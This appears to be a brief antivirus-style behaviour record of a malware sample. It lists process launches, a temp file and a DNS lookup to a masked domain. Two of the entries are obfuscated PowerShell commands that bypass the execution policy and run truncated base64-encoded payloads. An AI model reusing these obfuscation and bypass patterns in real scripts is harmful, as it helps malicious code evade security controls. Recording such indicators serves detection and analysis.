Technical Information
- '<SYSTEM32>\cmd.exe' /c P^O^W^E^R^S^H^E^L^L -exec Bypass -EC JABhAGQAcgBTAFMAcQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AEcAZQB0AEYAbwBsAGQAZQByAFAAYQB0AGgAKAAiAEMAbwBtAG0AbwBuAEEAcABwAGwAa...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1940
- %TEMP%\988547.cvr
- DNS ASK mm####usanna.info
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -exec Bypass -EC JABhAGQAcgBTAFMAcQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AEcAZQB0AEYAbwBsAGQAZQByAFAAYQB0AGgAKAAiAEMAbwBtAG0AbwBuAEEAcABwAGwAaQBjAGEAdABpAG8AbgBEAGEA...